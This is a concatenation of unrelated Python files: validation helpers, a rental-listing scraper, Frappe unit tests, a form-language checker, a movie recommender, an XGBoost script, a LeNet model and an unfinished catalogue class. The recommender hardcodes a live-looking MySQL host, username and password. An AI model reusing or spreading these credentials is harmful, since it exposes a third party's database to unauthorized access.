>>> has_integers([5]), has_integers(np.r_[:5])
(True, True)
>>> has_integers([5.]), has_integers(np.ones((5, 3)))
(False, False)
"""
if is_array_like(x):
x = np.array(x, copy=False)
if np.issubdtype(x.dtype, np.integer):
return True
return False
def is_boolean(x):
"""
Return :py:obj:`True` if `x` is a boolean.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import is_boolean
.. doctest::
>>> is_boolean(True), is_boolean(False)
(True, True)
>>> is_boolean(0), is_boolean(1)
(False, False)
"""
if isinstance(x, bool):
return True
return False
def has_booleans(x):
"""
Return :py:obj:`True` if `x` contains booleans.
Examples
--------
.. testsetup::
import numpy as np
from imot_tools.util.argcheck import has_booleans
.. doctest::
>>> has_booleans(np.ones((1, 2), dtype=bool)), has_booleans([True])
(True, True)
>>> has_booleans(np.ones((1, 2)))
False
"""
if is_array_like(x):
x = np.array(x, copy=False)
if np.issubdtype(x.dtype, np.bool_):
return True
return False
def is_even(x):
"""
Return :py:obj:`True` if `x` is an even integer.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import is_even
.. doctest::
>>> is_even(2)
True
>>> is_even(3)
False
"""
if is_integer(x):
if x % 2 == 0:
return True
return False
def has_evens(x):
"""
Return :py:obj:`True` if `x` contains even integers.
Examples
--------
.. testsetup::
import numpy as np
from imot_tools.util.argcheck import has_evens
.. doctest::
>>> has_evens(np.arange(5))
False
>>> has_evens(np.arange(0, 6, 2))
True
"""
if has_integers(x):
x = np.array(x, copy=False)
if np.all(x % 2 == 0):
return True
return False
def is_odd(x):
"""
Return :py:obj:`True` if `x` is an odd integer.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import is_odd
.. doctest::
>>> is_odd(2)
False
>>> is_odd(3)
True
"""
if is_integer(x):
if x % 2 == 1:
return True
return False
def has_odds(x):
"""
Return :py:obj:`True` if `x` contains odd integers.
Examples
--------
.. testsetup::
import numpy as np
from imot_tools.util.argcheck import has_odds
.. doctest::
>>> has_odds(np.arange(5))
False
>>> has_odds(np.arange(1, 7, 2))
True
"""
if has_integers(x):
x = np.array(x, copy=False)
if np.all(x % 2 == 1):
return True
return False
def is_pow2(x):
"""
Return :py:obj:`True` if `x` is a power of 2.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import is_pow2
.. doctest::
>>> is_pow2(8)
True
>>> is_pow2(9)
False
"""
if is_integer(x):
if x > 0:
exp = math.log2(x)
if math.isclose(exp, math.floor(exp)):
return True
return False
def has_pow2s(x):
"""
Return :py:obj:`True` if `x` contains powers of 2.
Examples
--------
.. testsetup::
import numpy as np
from imot_tools.util.argcheck import has_pow2s
.. doctest::
>>> has_pow2s([2, 4, 8])
True
>>> has_pow2s(np.arange(10))
False
"""
if has_integers(x):
x = np.array(x, copy=False)
if np.all(x > 0):
exp = np.log2(x)
if np.allclose(exp, np.floor(exp)):
return True
return False
def is_complex(x):
"""
Return :py:obj:`True` if `x` is a complex number.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import is_complex
.. doctest::
>>> is_complex(5), is_complex(5.0)
(False, False)
>>> is_complex(5 + 5j), is_complex(1j * np.r_[0][0])
(True, True)
"""
if isinstance(x, numbers.Complex) and (not isinstance(x, numbers.Real)):
return True
return False
def has_complex(x):
"""
Return :py:obj:`True` if `x` contains complex numbers.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import has_complex
.. doctest::
>>> has_complex([1j, 0]) # upcast to complex numbers.
True
>>> has_complex(1j * np.ones((5, 3)))
True
"""
if is_array_like(x):
x = np.array(x, copy=False)
if np.issubdtype(x.dtype, np.complexfloating):
return True
return False
def is_real(x):
"""
Return :py:obj:`True` if `x` is a real number.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import is_real
.. doctest::
>>> is_real(5), is_real(5.0)
(True, True)
>>> is_real(1j)
False
"""
return isinstance(x, numbers.Real)
def has_reals(x):
"""
Return :py:obj:`True` if `x` contains real numbers.
Examples
--------
.. testsetup::
from imot_tools.util.argcheck import has_reals
.. doctest::
>>> has_reals([5]), has_reals(np.arange(10))
(True, True)
>>> has_reals(1j * np.ones(5))
False
"""
if is_array_like(x):
x = np.array(x, copy=False)
if np.issubdtype(x.dtype, np.integer) or np.issubdtype(x.dtype, np.floating):
return True
return False
|
import time
import shutil
import random
import logging
from datetime import date
from typing import Optional
import typer
import joblib
import requests
import pandas as pd
from tqdm import tqdm
from bs4 import BeautifulSoup
from tenacity import retry, stop_after_attempt, wait_fixed, before_sleep_log
from requests.exceptions import HTTPError
from utils.post_processing import adjust_price_, auto_marking_
LOGGER = logging.getLogger(__name__)
#headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36'}
headers = {'User-Agent': 'Chrome/96.0.4664.45', 'Connection' : 'close'}
logging.basicConfig(filename="std.log",format='%(asctime)s %(message)s',filemode='w')
logger=logging.getLogger()
logger.setLevel(logging.DEBUG)
def get_attributes(soup):
result = {}
attributes = soup.select_one("ul.labelList").find_all("li")
for attr in attributes:
key = attr.find("div", attrs={"class": "one"}).text
if key in ['養寵物', '管理費', '車 位']:
result[key] = attr.find(
"div", attrs={"class": "two"}).text.replace(":", "")
attributes = soup.select_one("div.detailInfo").find_all("li")
for attr in attributes:
key, value = (x.strip() for x in attr.text.split(":"))
if key in ['格局', '樓層', '坪數', '型態', '社區']:
result[key] = value
return result
def retry_condition(exception):
"""Return True if we should retry (in this case when it's an IOError), False otherwise"""
if isinstance(exception, (HTTPError, AttributeError)):
print(f'HTTP error occurred: {exception}') # Python 3.6
return True
return False
#@retry(
# reraise=True, retry=retry_condition,
# stop=stop_after_attempt(5), wait=wait_fixed(10),
# before_sleep=before_sleep_log(LOGGER, logging.INFO))
def get_page(listing_id):
res = requests.get(
f'https://rent.591.com.tw/rent-detail-{listing_id}.html',headers=headers)
assert res.status_code == 200
return res.text
def get_listing_info(listing_id):
print("--------------------Terence")
get_page(listing_id)
soup = BeautifulSoup(get_page(listing_id), "lxml")
result = {"id": listing_id}
logger.error(soup)
#result['title'] = soup.select_one("span.houseInfoTitle").text
result['title'] = soup.select_one("title").text
print(result)
return result
'''
result['addr'] = soup.select_one("span.addr").text
print(result)
tmp = soup.select_one("div.detailInfo")
result['price'] = int(tmp.select_one("div.price").text.split(" ")[
0].strip().replace(",", ""))
print(result)
result['expired_at'] = tmp.find_all("span")[-1].text.split(":")[-1]
result['desc'] = soup.select_one("div.houseIntro").text.strip()
result['explain'] = soup.select_one("div.explain").text.strip()
result['poster'] = soup.select_one(
"div.avatarRight").find_all("div")[0].text.strip()
result.update(get_attributes(soup))
'''
def main(
source_path: str = "cache/listings.jbl", data_path: Optional[str] = None,
output_path: Optional[str] = None, limit: int = -1
):
listing_ids = joblib.load(source_path)
df_original: Optional[pd.DataFrame] = None
if data_path:
if data_path.endswith(".pd"):
df_original = pd.read_pickle(data_path)
else:
df_original = pd.read_csv(data_path)
listing_ids = list(
set(listing_ids) - set(df_original.id.values.astype("str"))
)
print(len(listing_ids))
if limit > 0:
listing_ids = listing_ids[:limit]
print(f"Collecting {len(listing_ids)} entries...")
data = []
for id_ in tqdm(listing_ids, ncols=100):
try:
data.append(get_listing_info(id_))
print(data)
except AttributeError:
print(f"Skipped {id_}")
pass
time.sleep(random.random() * 5)
df_new = pd.DataFrame(data)
print(df_new)
df_new = auto_marking_(df_new)
df_new = adjust_price_(df_new)
df_new["fetched"] = date.today().isoformat()
if df_original is not None:
df_new = pd.concat([df_new, df_original],
axis=0).reset_index(drop=True)
if output_path is None and data_path is None:
# default output path
output_path = "cache/df_listings.csv"
elif output_path is None and data_path:
output_path = data_path
shutil.copy(data_path, data_path + ".bak")
df_new["link"] = "https://rent.591.com.tw/rent-detail-" + \
df_new["id"].astype("str") + ".html"
if "mark" not in df_new:
df_new["mark"] = ""
column_ordering = [
"mark", "title", "price", "price_adjusted", "link", "addr",
"explain", "社區", "車 位", "管理費",
"poster", "養寵物", "格局", "坪數", "樓層", "型態",
"expired_at", "id", "desc", "fetched"
]
df_new[column_ordering].to_csv(output_path, index=False)
print("Finished!")
if __name__ == "__main__":
typer.run(main)
|
# -*- coding: utf-8 -*-
class MonteCarloBase(object):
def __init__(self):
if self.__class__ is MonteCarloBase:
raise NotImplementedError
self._d_firstSampleNumber = 0
self._d_lastSampleNumber = 0
self._d_currentSampleNumber = 1
self._d_inSample = False
self._d_inStochastic = True
self._d_inPremc = False
self._d_inPostmc = False
def premcloop(self):
msg = "Class needs to implement 'premcloop' method"
raise NotImplementedError(msg)
def postmcloop(self):
msg = "Class needs to implement 'postmcloop' method"
raise NotImplementedError(msg)
def nrSamples(self):
"""
Return the number of samples
"""
assert self._d_firstSampleNumber
return self._d_lastSampleNumber - \
self._d_firstSampleNumber + 1
def currentSampleNumber(self):
"""
Returns the current sample number
"""
assert self._d_currentSampleNumber
return self._d_currentSampleNumber
def sampleNumbers(self):
"""
Returns a list of sample numbers configured
"""
assert self._d_firstSampleNumber
return range(self._d_firstSampleNumber, \
self._d_lastSampleNumber + 1)
def _inStochastic(self):
if not hasattr(self, "_d_inStochastic"):
return False
return self._d_inStochastic
def _inPremc(self):
return self._d_inPremc
def _inPostmc(self):
return self._d_inPostmc
def _lastSampleNumber(self):
return self._d_lastSampleNumber
def _firstSampleNumber(self):
return self._d_firstSampleNumber
def _setCurrentSample(self, nr):
"""
Set the current sample number to nr.
"""
assert nr >= self._firstSampleNumber()
assert nr <= self._lastSampleNumber()
self._d_currentSampleNumber = nr
def _inSample(self):
"""
Return whether a sample is currently executing.
"""
#if hasattr(self._userModel(), "_d_inSample"):
return self._d_inSample
#else:
# return False
|
import codecademylib3_seaborn
import warnings
warnings.filterwarnings('ignore')
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
gradebook = pd.read_csv("gradebook.csv")
sns.barplot(data=gradebook, x="assignment_name", y="grade")
plt.show()
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
import unittest
import frappe
class TestClient(unittest.TestCase):
def test_set_value(self):
todo = frappe.get_doc(dict(doctype='ToDo', description='test')).insert()
frappe.set_value('ToDo', todo.name, 'description', 'test 1')
self.assertEqual(frappe.get_value('ToDo', todo.name, 'description'), 'test 1')
frappe.set_value('ToDo', todo.name, {'description': 'test 2'})
self.assertEqual(frappe.get_value('ToDo', todo.name, 'description'), 'test 2')
def test_delete(self):
from frappe.client import delete
todo = frappe.get_doc(dict(doctype='ToDo', description='description')).insert()
delete("ToDo", todo.name)
self.assertFalse(frappe.db.exists("ToDo", todo.name))
self.assertRaises(frappe.DoesNotExistError, delete, "ToDo", todo.name)
def test_http_valid_method_access(self):
from frappe.client import delete
from frappe.handler import execute_cmd
frappe.set_user("Administrator")
frappe.local.request = frappe._dict()
frappe.local.request.method = 'POST'
frappe.local.form_dict = frappe._dict({
'doc': dict(doctype='ToDo', description='Valid http method'),
'cmd': 'frappe.client.save'
})
todo = execute_cmd('frappe.client.save')
self.assertEqual(todo.get('description'), 'Valid http method')
delete("ToDo", todo.name)
def test_http_invalid_method_access(self):
from frappe.handler import execute_cmd
frappe.set_user("Administrator")
frappe.local.request = frappe._dict()
frappe.local.request.method = 'GET'
frappe.local.form_dict = frappe._dict({
'doc': dict(doctype='ToDo', description='Invalid http method'),
'cmd': 'frappe.client.save'
})
self.assertRaises(frappe.PermissionError, execute_cmd, 'frappe.client.save')
def test_run_doc_method(self):
from frappe.handler import execute_cmd
if not frappe.db.exists('Report', 'Test Run Doc Method'):
report = frappe.get_doc({
'doctype': 'Report',
'ref_doctype': 'User',
'report_name': 'Test Run Doc Method',
'report_type': 'Query Report',
'is_standard': 'No',
'roles': [
{'role': 'System Manager'}
]
}).insert()
else:
report = frappe.get_doc('Report', 'Test Run Doc Method')
frappe.local.request = frappe._dict()
frappe.local.request.method = 'GET'
# Whitelisted, works as expected
frappe.local.form_dict = frappe._dict({
'dt': report.doctype,
'dn': report.name,
'method': 'toggle_disable',
'cmd': 'run_doc_method',
'args': 0
})
execute_cmd(frappe.local.form_dict.cmd)
# Not whitelisted, throws permission error
frappe.local.form_dict = frappe._dict({
'dt': report.doctype,
'dn': report.name,
'method': 'create_report_py',
'cmd': 'run_doc_method',
'args': 0
})
self.assertRaises(
frappe.PermissionError,
execute_cmd,
frappe.local.form_dict.cmd
)
def test_array_values_in_request_args(self):
import requests
from frappe.auth import CookieManager, LoginManager
frappe.utils.set_request(path="/")
frappe.local.cookie_manager = CookieManager()
frappe.local.login_manager = LoginManager()
frappe.local.login_manager.login_as('Administrator')
params = {
'doctype': 'DocType',
'fields': ['name', 'modified'],
'sid': frappe.session.sid,
}
headers = {
'accept': 'application/json',
'content-type': 'application/json',
}
url = f'http://{frappe.local.site}:{frappe.conf.webserver_port}/api/method/frappe.client.get_list'
res = requests.post(
url,
json=params,
headers=headers
)
self.assertEqual(res.status_code, 200)
data = res.json()
first_item = data['message'][0]
self.assertTrue('name' in first_item)
self.assertTrue('modified' in first_item)
frappe.local.login_manager.logout()
|
# -*- coding: utf-8 -*-
"""
This module contains the logic of the QL checker. The QL checker looks for and
reports errors in the AST tree. This module concreteley detects:
- Duplicated declarations.
- Duplicated labels.
- Invalid assignations.
- Invalid conditions.
- Invalid operands.
- Cyclic dependencies.
- Undefined dependencies.
"""
from ql.ast.type import Boolean
from ql.ast.type import Undefined
class QLChecker(object):
def __init__(self, ast, checker):
"""Initialises QL Checker."""
super().__init__()
self.ast = ast
self.checker = checker
self.dependencies = {}
self.register = {}
self.types = {}
for node in ast.nodes:
self.__register_node(node)
def check(self):
"""
This function iterates through all the declared nodes in the AST and
checks for possible errors in them. In case any error is found, it is
reported to the checker.
"""
for node in self.ast.nodes:
self.__check_cyclic_dependencies(node)
self.__check_invalid_assignation(node)
self.__check_invalid_conditions(node)
self.__check_invalid_operands(node)
self.__check_undefined_dependencies(node)
def get_type(self, key):
"""
Returns the type of the node.
"""
try:
return self.types[key]
except KeyError:
# If this exception is triggered, it means that the variable
# itself that we are querying is an undefined variable. This
# error has been already reported with the function
# __check_undefined_id
return Undefined()
def register_error(self, node, message):
"""Registers an error in the typechcker"""
self.checker.add_error(node, message)
def register_warning(self, node, message):
"""Registers a warning in the typechecker"""
self.checker.add_warning(node, message)
def __register_node(self, node):
"""
Adds a node to the QL checker. It will also check for certain errors
detected on declaration time like duplicated questions and labels
(warning) and will report them to the typechecker which will process
them.
"""
# Checks if the declaration of the node will produce an error. Our
# register only allows to have one method declared so it is important
# to detect the
self.__check_duplicate_labels(node)
self.__check_duplicate_declarations(node)
# Add the type of the node to the dictionary.
self.types[node.variable.name] = node.variable.type
# Tracks the dependencies of the node.
dependencies = []
if node.expression:
expr = node.expression
dependencies += expr.depends_on()
for condition in node.conditions:
dependencies += condition.depends_on()
self.dependencies[node.variable.name] = dependencies
# Adds the node to a register with all the declared nodes.
self.register[node.variable.name] = node
###
# Checks on registration of the node.
###
def __check_duplicate_labels(self, node):
"""
Lookis for duplicated labels before adding it. If anyone is found,
it will raise a warning in the typechecker.
"""
labels = [item.text for key, item in self.register.items()]
if (node.text in labels):
msg = 'Duplicated field label {}'
self.register_warning(node, msg.format(node.text))
def __check_duplicate_declarations(self, node):
"""
Duplicate question declarations with different types.
The project description says that it should only detect duplicated
questions if they have different types. However, it makes more sense
detect any duplicate variable. Therefore, we do both.
"""
variable_name = node.variable.name
if variable_name in self.register:
msg = 'Duplicated question detected. It was {}'
existing_node = self.register[variable_name]
if (existing_node.variable.type != node.variable.type):
msg = 'Duplicated question with different type. It was {}'
self.register_error(node, msg.format(existing_node))
else:
# Here we take the design decision of keeping the existing one and
# ignoring the new one.
self.register[variable_name] = node
####
# Checks after registration of all the node.
####
def __check_invalid_conditions(self, node):
"""
This function checks for errors in the expressions. Concretely, it
checks for expressions used in conditionals that do not return a
boolean.
"""
# Looks for invalid conditionals.
for condition in node.conditions:
if condition.get_type(self) != Boolean():
msg = ('The expression {} in the condition does not return a '
'boolean')
self.register_error(node, msg.format(condition))
def __check_invalid_assignation(self, node):
"""
This function checks for errors in the expressions. It checks for
expressions used in assignations that return a diffrent type than the
expected by the variable.
"""
key = node.variable.name
if node.expression:
expr_type = node.expression.get_type(key)
node_type = self.get_type(key)
if node_type != expr_type:
msg = 'The assignation expected a {} but got a {}'
self.register_error(node, msg.format(node_type, expr_type))
def __check_invalid_operands(self, node):
"""
This function checks for errors in the expressions. It checks for
operations with operands that are not supported, like adding strings.
"""
queue = []
if node.expression:
queue += [node.expression]
queue += node.conditions
# Looks for operations with invalid operands.
# Order does not matter as all the expressions will be evaluated.
while queue:
expr = queue.pop()
children = expr.get_children()
try:
operation = expr.operation
for child in children:
if (operation not in
child.get_type(self).allowed_operations()):
msg = ('The child {} does not allow to perform the '
'{} operation')
self.register_error(node, msg.format(child, operation))
queue.append(child)
except AttributeError:
# It is a Leaf node, nothing to worry about. Even if this looks
# wrong, this is the pythonic way of doing it. It was this or
# giving the LeafNodes a operation attribute, which does not
# make sense.
pass
def __check_undefined_dependencies(self, node):
"""
Detects the errors in the dependencies of a node. It checks for
Undefined dependencies: Variables referenced in a expressions which are
not defined by any node.
"""
for dependency in self.dependencies[node.variable.name]:
if dependency not in self.dependencies:
msg = 'The node depends on a undefined variable "{}"'
self.register_error(node, msg.format(dependency))
def __check_cyclic_dependencies(self, node):
"""
Detects the errors in the dependencies of a node. It checks for nodes
which dependencies depend on them, also known as cyclic dependencies.
For this, we calcualte the extended dependencies of a node to not only
check the dependencies of the node but also the dependencies of the
dependencies.
"""
key = node.variable.name
for dependency in self.dependencies[key]:
# For every dependency of a key, we need to check the
# dependency and the ones that it has.
all_dependencies = self.__get_extended_dependencies(dependency)
if key in all_dependencies:
dependency_node = self.register[dependency]
msg = 'The node {} has a cyclic dependency with {}'
self.register_error(node, msg.format(node,
dependency_node))
def __get_extended_dependencies(self, key):
"""
Extracts the unique depencies of a key and the dependencies of the
depencies.
"""
all_dependencies = []
queue = []
if key in self.dependencies:
all_dependencies += self.dependencies[key]
queue += self.dependencies[key]
# I don't even want to think about the complexity of this.
while queue:
dependency = queue.pop()
if dependency in self.dependencies:
dependency_dependencies = self.dependencies[dependency]
all_dependencies += dependency_dependencies
for dependency_dependency in dependency_dependencies:
if dependency_dependency not in all_dependencies:
queue.append(dependency_dependency)
return all_dependencies
|
#!pip install pymysql
import pandas as pd
from sqlalchemy import create_engine
from sqlalchemy import insert
import pymysql
import mysql.connector as msql
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import linear_kernel
def predictPlot():
#Start MySQL connection
db_connection_str = 'mysql+pymysql://sql4399167:VMAJwNlAix@sql4.freesqldatabase.com/sql4399167'
db_connection = create_engine(db_connection_str)
#Query userid, movieid for prediction
history = pd.read_sql('select user_id,movie_id from user_history order by date_time desc limit 1', con=db_connection)
user=history['user_id'].iloc[0]
premovie=history['movie_id'].iloc[0]
#Query necessary columns for first suggestion system
plot_df = pd.read_sql('select movie_id,title,plot from movies', con=db_connection)
plot_df['plot'].head(3)
#Define a TF-IDF Vectorizer Object. Remove all english stop words such as 'the', 'a'
tfidf = TfidfVectorizer(stop_words='english')
#Replace NaN with an empty string
plot_df['plot'] = plot_df['plot'].fillna('')
#Construct the required TF-IDF matrix by fitting and transforming the data
tfidf_matrix = tfidf.fit_transform(plot_df['plot'])
#Output the shape of tfidf_matrix
tfidf_matrix.shape
#Array mapping from feature integer indices to feature name.
tfidf.get_feature_names()[5:15]
# Compute the cosine similarity matrix
cosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)
cosine_sim.shape
cosine_sim[1]
#Construct a reverse map of indices and movie titles
indices = pd.Series(plot_df.index, index=plot_df['movie_id']).drop_duplicates()
indices[:10]
# Function that takes in movie title as input and outputs most similar movies
def get_recommendations(title, cosine_sim=cosine_sim):
# Get the index of the movie that matches the title
idx = indices[title]
# Get the pairwsie similarity scores of all movies with that movie
sim_scores = list(enumerate(cosine_sim[idx]))
# Sort the movies based on the similarity scores
sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)
# Get the scores of the 10 most similar movies
sim_scores = sim_scores[1:11]
# Get the movie indices
movie_indices = [i[0] for i in sim_scores]
# Return the top 10 most similar movies
return plot_df['movie_id'].iloc[movie_indices]
sug_movie2 = get_recommendations(premovie)
sug_movie2.head()
#Update user_predictions
mydb = msql.connect(
host="sql4.freesqldatabase.com",
user="sql4399167",
password="VMAJwNlAix",
database="sql4399167"
)
mycursor = mydb.cursor()
smovieid1 = sug_movie2.iloc[0]
smovieid2 = sug_movie2.iloc[1]
sql = "UPDATE user_predictions SET sg_movie_id_2 = %s, sg_movie_id_3 = %s WHERE user_id = %s"
val = (str(smovieid1),str(smovieid2),str(user))
mycursor.execute(sql,val)
mydb.commit()
print("Recommendations updated for user ",user)
#predictPlot()
|
class PlayerStatus:
def __init__(self, data: dict) -> None:
"""
Parameters
----------
data: dict
The JSON data received from the Hypixel API.
"""
self.UUID = data["uuid"]
self.SESSION_INFO = data["session"]
def __str__(self) -> str:
return self.UUID
def __repr__(self) -> str:
return f'<{self.__class__.__name__} uuid="{self.UUID}" online="{self.SESSION_INFO["online"]}">'
def __hash__(self) -> int:
return hash(self.UUID)
def __eq__(self, other: "PlayerStatus") -> bool:
return self.UUID == other.UUID
|
/anaconda3/lib/python3.7/codecs.py |
import xgboost as xgb
import numpy as np
import pandas
major_list = []
training_csv = pandas.read_csv('./train.csv', index_col=0)
testing_csv = pandas.read_csv('./test_2.csv', index_col=0)
for Number in range(1,62+1): # From 1 to 62
if Number == 61:
name_of_column = 'Ret_PlusOne'
name_of_weight = 'Weight_Daily'
elif Number == 62:
name_of_column = 'Ret_PlusTwo'
name_of_weight = 'Weight_Daily'
else:
name_of_column = 'Ret_'+str(Number+120)
name_of_weight = 'Weight_Intraday'
train_targets = training_csv[name_of_column].values
train_weights = training_csv[name_of_weight].values
training_data = training_csv.drop(training_csv.columns[range(146, 210)], axis=1)
training_data = training_data.values
testing_data = testing_csv.values
data_train = xgb.DMatrix(training_data, label=train_targets, missing=np.NaN, weight=train_weights)
data_test = xgb.DMatrix(testing_data, missing=np.NaN)
model_parameters = {'max_depth': 10, 'eta': 0.1, 'silent': 1, 'gamma': 0, 'lambda': 500, 'alpha': 400}
number_of_rounds = 500
watchlist = [(data_train, 'train')]
bst = xgb.train(model_parameters, data_train, number_of_rounds, watchlist, early_stopping_rounds=10)
predictions = bst.predict(data_test)
for ID, P in enumerate(predictions):
major_list.append({'Id': str(ID+1)+'_'+str(Number), 'Predicted': P})
output = pandas.DataFrame(data=major_list)
output.sort_values(by='Id', inplace=True)
print(output.head())
output.to_csv(path_or_buf="./output.csv",index=False)
|
'''LeNet in PyTorch.
Modified based on (https://github.com/kuangliu/pytorch-cifar/blob/master/models/lenet.py)
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
class LeNet(nn.Module):
def __init__(self):
super(LeNet, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5, stride=2, bias=False)
# self.pool1 = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5, stride=2, bias=False)
# self.pool2 = nn.MaxPool2d(2, 2)
self.fc1 = nn.Linear(16*5*5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
out = F.relu(self.conv1(x))
# out = self.pool1(out)
out = F.relu(self.conv2(out))
# out = self.pool2(out)
out = torch.flatten(out, 1) # out.view(out.size(0), -1)
out = F.relu(self.fc1(out))
out = F.relu(self.fc2(out))
out = self.fc3(out)
return out
|
from collections import OrderedDict as dict
import pandas as pd
import numpy as np
__all__ = ['CatalogueGroup',
'Catalogue']
class CatalogueGroup(object):
""" CatalogueGroup class.
This is basically a dictionary used by Catalogue class. The idea is
to be able to store different types of data inside the main catalogue
instance.
Since it's a Sorted Dictionary all the data remain in order as they
are inserted, and the performances are better than standard lists.
CatalogueGroup class store similar items or relationship. This collections of items
could be seen as a group. The group could be defined by the type
of the class, name, tag or anything. It's will depend on the needs
and this will be managed for the main catalog class.
This class will also manage the callbacks so the catalogue will be able
to know whether an element has been added, removed or modified.
Each CatalogueGroup has a (name) and a function (callback) when action is
performed inside the dictionary.
The function callback need to be implemented as follows:
def callback_name(id, key, option):
Where:
name: name of the current GRoup or dictionary
key: the item that has been, added, removed or modifed
option: action performed added, removed or modifed
"""
ADDED = 0
REMOVED = 1
MODIFIED = 2
@property
def items(self):
return self._items
@property
def name(self):
return self._name
def __init__(self, name, callback=None):
""" Initialize all the variables
"""
self._name = name
self._items = dict()
self._callback = callback
def _notify(self, key, option):
"""Notify when a new element has been added.
"""
if self._callback is not None:
self._callback(self._name, key, option)
def __setitem__(self, key, value):
"""Add a new items into the items list.
"""
if key in self._items:
option = CatalogueGroup.MODIFIED
else:
option = CatalogueGroup.ADDED
#Set the current item (added or modified)
self._items[key] = value
# Finally callback to the function
self._notify(key, option)
def __delitem__(self, key):
""" Delete current item for the list
"""
del self._items[key]
# Finally notify to the callback
self._notify(key, CatalogueGroup.REMOVED)
def __getitem__(self, key):
"""Retrieve the items with the given key
"""
return self._items[key]
def __contains__(self, key):
"""Returns whether the key is in items or not.
"""
return key in self._items
def __iter__(self):
"""Retrieve the items elements using loops statements.
This usually are more efficent in terms of memory
"""
for item in self._items:
yield item
def __str__(self):
""" Build the default function to represent the catalogue
user friendly
"""
result = ""
for index, item in enumerate(self._items):
result += " item {} <{}> : {} \n".format(index, item, str(self._items[item]))
return result
class Catalogue(object):
""" Catalogue Class
This class will be used to store different types of data and
bind them. The class will manage different groups or dictionaries
depending on the types to be stored.
Catalogue works as a database. For this particular reason it will need
columns and indexes in order to works properly. In the constructor
we have to pass he index name of the group that will be used to
indexing the data.
ej. You have three groups: Entity, Component_type2 and Component_type2.
(The same catalog should be shared between the three groups)
The index will be "Entity", this means we can bind and Entity with a
component_typeXX. Then we can use the pandas dataframe to pick
the elements you need.
>> #Get the dataframe form the catalogue
>> df = Catalogue.dataframe
>> # Get the current entity-components
>> entity_component = df.loc[:,component_types].dropna(axis=0)
>> print(df.head())
Component_type1 Component_type2
entity02 NaN NaN
entity03 Transform03 NaN
entity05 NaN NaN
The index is given in the contructor of the class, where index is
the name of a group (existing) in the catalogue.
However this Class could be used for any other pourpose
like managing resources, references or any map-reduce
systems that requires a Hastable to store some data
and make relation between data
Basically, Catalogue will store:
- Entities created (depending on the type)
- Components created (depensding on the type)
- Systems created ( depending on the type)
- Mapping between entities, components and Systems
The maping between each data will be performed by
calling the link function of catalogue. This is to
link entities and components.
To show the data stored, with the catalogue and bindings,
you can use two ways.
# Create the main Catalogue
catalogue = Catalogue(index = catalogue_index)
print(catalogue)
print(repr(catalogue.head()))
or
print(catalogue.dataframe.head(10))
Basic example
# Test
catalogue_index = "Entity"
catalogue_col1 = "Transform"
catalogue_col2 = "Position"
catalogue_col3 = "Health"
catalogue_col4 = "Renderable"
entities = ["entity01", "entity02", "entity03", "entity04","entity05"]
components = [catalogue_col1, catalogue_col2, catalogue_col3,catalogue_col4]
entity01_comp = ["Transform01", None , None , "Renderable01" ]
entity02_comp = ["Transform02", None , "Health02" , "Renderable02" ]
entity03_comp = ["Transform03", "Position03", None , None ]
entity04_comp = ["Transform04", "Position04", "Health04" , None ]
entity05_comp = ["Transform05", None , "Health05" , "Renderable05" ]
entities_comp = [entity01_comp, entity02_comp, entity03_comp, entity04_comp, entity05_comp ]
# Create the main Catalogue
catalogue = Catalogue(index = catalogue_index)
# Add all the entities into the catalogue
for index, entity in enumerate(entities):
# Add current entity
catalogue[catalogue_index][entity] = entity
# Add component for the current entity
for cindex, ctype in enumerate(components):
comp_instance = entities_comp[index][cindex]
if comp_instance is not None:
# Add current component to the catalogue
catalogue[ctype][comp_instance] = comp_instance
# Bind the current comp with it's entity
catalogue.bind(entity, ctype, comp_instance)
print(catalogue)
print(catalogue.dataframe.head(10))
Output:
GROUP Entity:
item 0 <entity01> : entity01
item 1 <entity02> : entity02
item 2 <entity03> : entity03
item 3 <entity04> : entity04
item 4 <entity05> : entity05
GROUP Transform:
item 0 <Transform01> : Transform01
item 1 <Transform02> : Transform02
...
item 1 <Health04> : Health04
item 2 <Health05> : Health05
GROUP Position:
item 0 <Position03> : Position03
item 1 <Position04> : Position04
Dataframe:
Transform Renderable Health Position
entity01 Transform01 Renderable01 NaN NaN
entity02 Transform02 Renderable02 Health02 NaN
entity03 Transform03 NaN NaN Position03
entity04 Transform04 NaN Health04 Position04
entity05 Transform05 Renderable05 Health05 NaN
# Delete and index entity
del catalogue[catalogue_index]["entity01"]
del catalogue[catalogue_index]["entity04"]
print(catalogue.dataframe.head(10))
# Delete components
del catalogue[catalogue_col1]["Transform02"]
del catalogue[catalogue_col4]["Renderable05"]
del catalogue[catalogue_col2]["Position04"]
Transform Renderable Health Position
entity02 NaN NaN NaN NaN
entity03 Transform03 NaN NaN Position03
entity05 NaN NaN NaN NaN
"""
@property
def dataframe(self):
return self._dataframe
@property
def index(self):
return self._index
@index.setter
def index(self, value):
self._index = value
def __init__(self, index):
"""Initialize variables and objects.
"""
# Create a catalogue with all the entities and components
self._groups = dict()
self._items = dict()
self._index = index
# Create the datafram to map the entity - components
self._dataframe = pd.DataFrame()
def __setitem__(self, key, value):
""" Catlogue doesn't allow to create new items manually
"""
pass
def __getitem__(self, key):
"""Retrieve the items with the given key
"""
# Check if the calalogue has been already created.
if key not in self._groups:
self._groups[key] = CatalogueGroup(key, self._callback_group)
return self._groups[key]
def __contains__(self, key):
"""Returns whether the key is in items or not.
"""
return key in self._groups
def __iter__(self):
"""Retrieve the items elements using loops statements.
This usually are more efficent in terms of memory
"""
for group in self._groups:
yield group
def __getattr__(self, key):
